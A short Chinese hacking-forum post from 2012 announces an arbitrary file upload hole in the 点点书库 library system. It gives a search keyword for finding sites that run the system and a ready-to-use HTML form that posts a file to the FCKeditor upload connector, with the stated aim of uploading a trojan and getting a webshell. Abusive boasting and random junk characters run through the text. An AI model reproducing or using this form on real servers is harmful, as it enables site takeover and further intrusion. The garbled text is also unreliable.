主题:图书馆系统任意文件上传漏洞2 R0 N$ `! ?( r. I3 ^% ?5 @% ~8 K) i
作者:冰锋刺客- W7 K' o5 _9 j; m
厂商:点击书(dianjishu.com)
* K# t, e/ j) h 日期:2012-6-21
3 X6 h8 w) G$ u! z. Q9 o5 ?2 ?
: U6 R3 I* G4 VI 概述& ^2 Q( J' H8 o: f/ C
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell! Y3 ]% s# F4 f& A1 B9 n" n
II 简介
) }7 D9 Z/ g# v% S( r 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved": P; {3 N. X9 U& z
补充一个漏洞2 t. Z* y# u, A* `/ {* `
<form id="frmUpload" enctype="multipart/form-data"
5 i u) W: _7 B action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>; m5 q; I7 ^9 U( {5 m6 h
<input id="btnUpload" type="submit" value="操翻他">
+ h! l* Q$ \: b+ C# k, a9 _ </form>
- e, k+ ]+ D; I c/ o. U 你们懂的
( Z4 o) I! O0 H; z. M4 B8 t# W9 w5 _ 那傻逼提供还需要改包.
, |, `; }; U4 x+ E7 G9 I" h% @ 自己看了下源代码发现fckeditor: z; T* q/ u% z; a, ~
直接秒杀* {" u2 O( r, L8 N& Z. l
|